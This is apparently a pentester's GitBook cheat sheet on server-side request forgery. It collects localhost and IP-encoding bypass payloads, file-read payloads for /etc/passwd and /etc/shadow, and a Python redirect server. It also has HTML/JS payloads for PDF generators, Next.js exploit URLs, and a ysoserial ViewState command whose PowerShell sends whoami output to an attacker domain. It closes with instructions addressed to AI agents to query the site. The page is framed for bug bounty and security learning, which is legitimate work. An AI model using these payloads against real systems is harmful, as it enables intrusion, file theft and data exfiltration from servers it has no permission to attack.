# SSRF

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

<figure><img src="/files/2edRXPvdlgAi5NCTgBW9" alt=""><figcaption></figcaption></figure>

## Detection - Vulnerable Parameters

```
?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}
?show={target}
?navigation={target}
```

{% embed url="<https://labs.detectify.com/security-guidance/ssrf-vulnerabilities-and-where-to-find-them/>" %}

{% embed url="<https://github.com/MindPatch/lorsrf>" %}

## Burp extension

Collaborator everywhere

{% embed url="<https://portswigger.net/bappstore/2495f6fb364d48c3b6c984e226c02968>" %}

## Basic payload

```
http://127.0.0.1
```

```
127.0.0.1:80
127.0.0.1:443
127.0.0.1:22
127.1:80
0
0.0.0.0:80
localhost:80
[::]:80/
[::]:25/ SMTP
[::]:3128/ Squid
[0000::1]:80/
[0:0:0:0:0:ffff:127.0.0.1]/thefile
①②⑦.⓪.⓪.⓪
127.127.127.127
127.0.1.3
127.0.0.0
2130706433/
017700000001
3232235521/
3232235777/
0x7f000001/
0xc0a80014/
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@127
.0.0.1
127.0.0.1#{domain}
{domain}.127.0.0.1
127.0.0.1/{domain}
127.0.0.1/?d={domain}
{domain}@localhost

localhost#{domain}
{domain}.localhost
localhost/{domain}
localhost/?d={domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}
127.0.0.1%00{domain}
127.0.0.1?{domain}
127.0.0.1///{domain}st:+11211aaa
st:00011211aaaa
0/
127.1
127.0.1
1.1.1.1 &@2.2.2.2# @3
.3.3.3/
127.1.1.1:80\\@127
.2.2.2:80/
127.1.1.1:80\\@@127
.2.2.2:80/
127.1.1.1:80:\\@@127
.2.2.2:80/
127.1.1.1:80#\\@127
.2.2.2:80/
```

### Paylod List

{% embed url="<https://github.com/coffinxp/payloads/blob/main/ssrf.txt>" %}

### SSRF to LFI

{% content-ref url="/pages/JrFm2DfMRvUJ0bx03YhO" %}
[File Inclusion LFI / RFI](/0xss0rz/pentest/web-attacks/file-inclusion-lfi-rfi.md)
{% endcontent-ref %}

```
file:/etc/passwd%3F/
file:/etc%252Fpasswd/
file:/etc%252Fpasswd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252Fpas${te}swd%3F/
file:$(br)/et$(u)c%252Fpas$(te)swd%3F/

SSRF POLYGLOT
file:///etc/passwd?/../passwd
```

## Finding SSRF with Burp

Match: **https?:\\/\\/(www\\.)?\[-a-zA-Z0–9@:%.\_\\+\~#=]{1,256}\\.\[a-zA-Z0–9()]{1,6}\b(\[-a-zA-Z0–9()@:%\_\\+.\~#?&//=]\*)**

Replace: `https://{YOUR_SERVER}/ (Burp Collaborator)`

<figure><img src="/files/phIfOHlgDtcXo4AJ1Jbw" alt=""><figcaption></figcaption></figure>

Source: <https://x.com/intigriti/status/1848288871735320916?t=bTTpk3N1LoqLpO1768DhQw&s=03>

{% embed url="<https://dant0x65.medium.com/bug-bounty-tip-automating-ssrf-ea344ec59962>" %}

## Port scan

```
http://127.0.0.1:§80§
```

<figure><img src="/files/QetwLTxe9p95NmcUagpM" alt=""><figcaption></figcaption></figure>

List of common ports

{% embed url="<https://gist.githubusercontent.com/sidxparab/45fe9c487a4d7b793b44ac92ec156b36/raw/a3862b37d4671d3446fc27bba4bbbe5667355b09/common-web-ports.txt>" %}

## Filter Bypass

{% embed url="<https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass>" %}

Burp extension

{% embed url="<https://github.com/hackerassociate/SSRF-Hacks-IP-Decimal>" %}

### Decimal notation

```
http://2130706433 equals http://127.0.0.1.
```

{% embed url="<https://pravinponnusamy.medium.com/ssrf-payloads-f09b2a86a8b4>" %}

### Other notation

```
127.1 equals 127.0.0.1
```

<figure><img src="/files/lLN9vLe56hyYhFJzaJQd" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/vysecurity/IPFuscator>" %}

```
IPFuscator
Author: Vincent Yiu (@vysecurity)
https://www.github.com/vysec/IPFuscator
Version: 0.1.0

IP Address:     127.0.0.1

Decimal:        2130706433
Hexadecimal:    0x7f000001
Octal:          017700000001

Full Hex:       0x7f.0x0.0x0.0x1
Full Oct:       0177.0.0.01

Random Padding:
Hex:    0x000000000007f.0x000000000000000000000000000000.0x0000.0x0000000000000000000000001
Oct:    00000000000000000000000177.000000000000000000.00000000000000000000000000000.000001

Random base:
#1:     0x7f.0x0.0.01
#2:     0x7f.0x0.0x0.1
#3:     0177.0x0.0x0.0x1
#4:     0x7f.0.0.01
#5:     127.0x0.0.0x1

Random base with random padding:
#1:     127.0x00000000.000000.000000000000000001
#2:     127.0x0000000000000.0x00000000000000000000000000000.0001
#3:     0000000000000000177.0x0000000000000000000000.0x00000000000000000000000000.1
#4:     0000000000000000000177.0.000000.1
#5:     127.0000000000000000000000.0x0000000000000000000.000000000000000000000000000001
```

{% embed url="<https://github.com/whiteSHADOW1234/MorphURL>" %}

```
1%32%37.0.0.%31
12%37.%30.%30.%31
%31%327.%30.0.%31
%31%327.%30.%30.1
12%37.0.%30.1
127.%30.%30.%31
1%32%37.0.%30.1
%3127.0.0.%31
%31%32%37.0.%30.%31
1%32%37.%30.0.1
%31%32%37.0.0.%31
%31%32%37.%30.0.%31
%312%37.0.%30.1
%312%37.0.%30.%31
127.0.%30.%31
%31%32%37.0.0.1
1%327.%30.%30.1
%312%37.%30.0.1
%31%32%37.0.%30.1
1%327.%30.0.%31
127.%30.0.%31
%31%327.0.0.%31
127.%30.%30.1
%3127.0.%30.%31
%31%327.%30.%30.%31
1%32%37.%30.%30.1
%3127.%30.%30.1
%31%327.0.%30.1
12%37.%30.0.%31
12%37.%30.%30.1
%312%37.%30.%30.1
1%32%37.0.%30.%31
%31%32%37.%30.0.1
%312%37.0.0.%31
12%37.0.%30.%31
%312%37.%30.0.%31
1%32%37.%30.0.%31
%3127.%30.0.%31
%3127.0.%30.1
%312%37.%30.%30.%31
%31%327.0.%30.%31
1%327.0.%30.%31
1%327.%30.%30.%31
```

More payload: <https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass>

### IP encoding

Here IP 8.8.4.4 (Google DNS) is used:

```
8.8.1028 → Partial Decimal (Class B)
Combines the 3rd and 4th octets: 4 × 256 + 4 = 1028

8.525316 → Partial Decimal (Class A)
Combines the last three octets into one decimal number

0x08.8.004.004 → Mixed Encoding
Hexadecimal + Decimal + Octal (segment by segment)

0x08.0x08.004.004 → Double Hex + Octal
Two segments in hex, two in octal

0x08.010.4.4 → Hex + Octal + Decimal Mix

134743044 → Single Decimal
Full 32-bit integer representation of the IP

0x08080404 → Full Hexadecimal IP
Entire IP encoded as a single hex literal

010.010.004.004 → All Octal
Each segment padded with 0 to force octal interpretation

0x8.0x8.0x4.0x4 → Hex per Segment
All four octets encoded individually in hex

8.8.0x404 → Partial Hex (Class B)
Last segment in hex: 0x404 = 1028
```

### Use your own server to redirect on localhost

{% embed url="<https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530>" %}

`redirector.py`:

```
#!/usr/bin/env python3

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv)-1 != 2: 
    print("""
Usage: {} <port_number> <url> 
    """.format(sys.argv[0]))
    sys.exit()
    
class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers() 
    def send_error(self, code, message=None): 
        self.send_response(302) 
        self.send_header('Location', sys.argv[2]) 
        self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```

Run redirector server:

```
python3 redirector.py 80 http://127.0.0.1
```

Vicitim payload: `http://[YOUR_IP]`

<figure><img src="/files/g4WNSvXDmVYl7TX7XopH" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/04Pz4r7N3H7NHZ24dulO" alt=""><figcaption></figcaption></figure>

### DNS Rebinding

{% embed url="<https://lock.cmpxchg8b.com/rebinder.html>" %}

<figure><img src="/files/WHYlSU5CctrKb2lgIJlA" alt=""><figcaption></figcaption></figure>

Also try `127.0.0.1` and `169.254.169.254`

<figure><img src="/files/RWZ3UIo5f8601ZK2fq0b" alt=""><figcaption></figcaption></figure>

{% embed url="<https://mokhansec.medium.com/bypassing-filters-ssrf-exploitation-via-dns-rebinding-with-just-1-in-30-successful-requests-2fdc3a9cfd7d>" %}

{% embed url="<https://medium.com/@amnotacat/using-wayback-and-dns-rebinding-for-ssrf-a5a16f611acc>" %}

{% embed url="<https://blog.securelayer7.net/server-side-request-forgery-dns-rebinding-attack/>" %}

{% embed url="<https://mokhansec.medium.com/bypassing-filters-ssrf-exploitation-via-dns-rebinding-with-just-1-in-30-successful-requests-2fdc3a9cfd7d>" %}

### More payloads

{% embed url="<https://gist.github.com/rootsploit/66c9ae8fc3ef387fa5ffbb67fcef0766>" %}

Also check [Paylaod List](#paylod-list)

## Cloud Metadata IP

```
169.254.169.254 
169.254.43518 
169.16689662
0xA9.254.0251.0376
```

{% embed url="<https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet>" %}

## URL / Host Validation Bypass

{% embed url="<http://freedns.afraid.org/subdomain/>" %}

<figure><img src="/files/tMzk6IURNdPoSG7Set46" alt=""><figcaption></figcaption></figure>

```
https://assets.example.com.attacker.com/
```

Replace "{CANARY\_TOKEN}" with your controlled hostname and replace "example.com" with a whitelisted target host.

```
.{CANARY_TOKEN}
@{CANARY_TOKEN}
example.com.{CANARY_TOKEN}
example.com@{CANARY_TOKEN}
example.comx.{CANARY_TOKEN}
{CANARY_TOKEN}#example.com
{CANARY_TOKEN}?example.com
{CANARY_TOKEN}#@example.com
{CANARY_TOKEN}?@example.com
127.0.0.1.nip.io
example.com.127.0.0.1.nip.io
127.1
localhost.me
```

{% embed url="<https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet>" %}

{% embed url="<https://www.youtube.com/watch?v=3VJKmARDzJ4>" %}

### Bypassing protocol whitelists <a href="#id-3-bypassing-protocol-whitelists" id="id-3-bypassing-protocol-whitelists"></a>

```
//{CANARY_TOKEN}
\\{CANARY_TOKEN}
////{CANARY_TOKEN}
\\\\{CANARY_TOKEN}
http:{CANARY_TOKEN}
https:{CANARY_TOKEN}
/%00/{CANARY_TOKEN}
/%0A/{CANARY_TOKEN}
/%OD/{CANARY_TOKEN}
/%09/{CANARY_TOKEN}
```

## URL Schemes

`file://`, `dict://`, `sftp://`,  `ldap://`, `tftp://`, `gopher://`

## Gopher

{% embed url="<https://infosecwriteups.com/how-gopher-works-in-escalating-ssrfs-ce6e5459b630>" %}

{% embed url="<https://github.com/tarunkant/Gopherus>" %}

## Blind SSRF with OOB

{% embed url="<https://github.com/assetnote/blind-ssrf-chains?s=03>" %}

{% embed url="<https://tcm-sec.com/find-and-exploit-blind-ssrf-with-out-of-band-oob-techniques/>" %}

See [Use your own server to redirect on localhost](#use-your-own-server-to-redirect-on-localhost)

### Platform to receive HTTP & DNS callbacks for SSRF (Blind) - interactsh

{% embed url="<https://github.com/projectdiscovery/interactsh>" %}

## SSRF (XSS) in PDF Generator

{% content-ref url="/pages/3ptIFDNOAiza85XhvHQO" %}
[XSS](/0xss0rz/pentest/web-attacks/xss.md)
{% endcontent-ref %}

{% embed url="<https://medium.com/@armaanpathan/pdfreacter-ssrf-to-root-level-local-file-read-which-led-to-rce-eb460ffb3129>" %}

```
<iframe src="http://localhost/"></iframe>
```

```
<iframe src=file:///etc/passwd></iframe>
"/><iframe src="file:///etc/shadow"></iframe>
```

```
<!-- Using XHR -->
<script>var x=new XMLHttpRequest();x.onload=(()=>document.write(this.responseText));x.open('GET','http://127.0.0.1');x.send();</script>

<!-- Using Fetch -->
<script>fetch('http://127.0.0.1').then(async r=>document.write(await r.text()))</script>

<!-- Using embed -->
<embed src="http://127.0.0.1" />

<!-- Using base HTML tag -->
<base href="http://127.0.0.1" />

<!-- Loading external stylesheet/script -->
<link rel="stylesheet" src="http://127.0.0.1" />
<script src="http://127.0.0.1"></script>

<!-- Meta-tag to auto-refresh page -->
<meta http-equiv="refresh" content="0; url=http://127.0.0.1/" />

<!-- Loading external image -->
<img src="http://127.0.0.1" />

<!-- Loading external SVG -->
<svg src="http://127.0.0.1" />

<!-- Useful to bypass blacklists -->
<input type="image" src="http://127.0.0.1" />
<video src="http://127.0.0.1" />
<audio src="http://127.0.0.1" />
<audio><source src="http://127.0.0.1"/></audio>
```

```
<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open('GET','http://127.0.0.1'); // You can also read local system files such as "/etc/passwd"
  x.send();
</script>
```

```
<script>
  var x = new XMLHttpRequest();
  x.onload=function(){ document.write(this.responseText) };
  x.open("GET","file:///etc/passwd"); x.send();
</script>
```

{% hint style="info" %}
*Some PDF generators rely on the Chromium web browser without sandbox security enabled and with root privileges. This can often be further escalated to remote code execution!*
{% endhint %}

{% embed url="<https://www.blackhillsinfosec.com/hunting-for-ssrf-bugs-in-pdf-generators/>" %}

{% embed url="<https://infosecwriteups.com/exploiting-ssrf-in-pdf-html-injection-basic-and-blind-047fec5317ae>" %}

{% embed url="<https://www.intigriti.com/researchers/blog/hacking-tools/exploiting-pdf-generators-a-complete-guide-to-finding-ssrf-vulnerabilities-in-pdf-generators>" %}

### PDF Generator - SSRF in .NET Application to RCE

{% embed url="<https://medium.com/@0xUN7H1NK4BLE/how-ssrf-leads-to-rce-in-a-net-application-ee1b13812245>" %}

```
<html>
<script>
    window.location='file:///C:/Windows/System32/drivers/etc/hosts'
</script>
</html>
```

Look for encryption keys in `web.config`

Craft a `ViewState` payload that executed a PowerShell command to exfiltrate server information

```
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe -Command \"$w=(whoami); Invoke-WebRequest -Uri http://<attackerdomain>/aaaa?data=$w -UseBasicParsing\"" --path="<path>.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="<decrypt-key>" --validationalg="SHA1" --validationkey="<key>"
```

## NextJS apps

{% content-ref url="/pages/QcjbFMTjwQZZ3tmdx1kN" %}
[Next.js / React / Vue.js](/0xss0rz/pentest/public-exploit/next.js-react-vue.js.md)
{% endcontent-ref %}

CVE-2024-34351 - fixed in v14.1.1.

```
https://example.com/_next/image?url=https://localhost:2345/api/v1/x&w=256&q=75
```

```
https://example.com/_next/image?url=https://third-party.com/logout%3furl%3Dhttps%3A%2F%2Flocalhost%3A2345%2Fapi%2Fv1%2Fx&w=256&q=75
```

{% embed url="<https://www.assetnote.io/resources/research/digging-for-ssrf-in-nextjs-apps>" %}

## Tools

### SSRFHunter

{% embed url="<https://github.com/BotGJ16/SSRFHunter>" %}

### SSRFmap

{% embed url="<https://github.com/swisskyrepo/SSRFmap>" %}

### Autossrf

{% embed url="<https://github.com/Th0h0/autossrf>" %}

### 0dSSRF

{% embed url="<https://github.com/KariiemGamal/0dSSRF?s=03>" %}

### SSRFPwned

{% embed url="<https://github.com/blackhatethicalhacking/SSRFPwned>" %}

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="/files/a876wNYE568SJIfTZVxL" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %}
[Interesting Books](/0xss0rz/interesting-books.md)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)

## Resources

{% embed url="<https://www.yeswehack.com/fr/learn-bug-bounty/server-side-request-forgery-ssrf>" %}

{% embed url="<https://github.com/trilokdhaked/Bug-Bounty-Methodology/blob/main/Server%20Side%20Request%20Forgery.md>" %}

{% embed url="<https://blog.intigriti.com/hacking-tools/ssrf-a-complete-guide-to-exploiting-advanced-ssrf-vulnerabilities>" %}

{% embed url="<https://www.hackerone.com/application-security/how-server-side-request-forgery-ssrf>" %}

{% embed url="<https://highon.coffee/blog/ssrf-cheat-sheet/>" %}

{% embed url="<https://owasp.org/Top10/fr/A10_2021-Server-Side_Request_Forgery_(SSRF)/>" %}

{% embed url="<https://portswigger.net/web-security/ssrf>" %}

{% embed url="<https://www.imperva.com/learn/application-security/server-side-request-forgery-ssrf/>" %}

{% embed url="<https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html>" %}

{% embed url="<https://www.intigriti.com/hackademy/server-side-request-forgery-ssrf>" %}

{% embed url="<https://infosecwriteups.com/i-studied-100-ssrf-reports-and-heres-what-i-learned-1654c72ee2df>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/ssrf.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.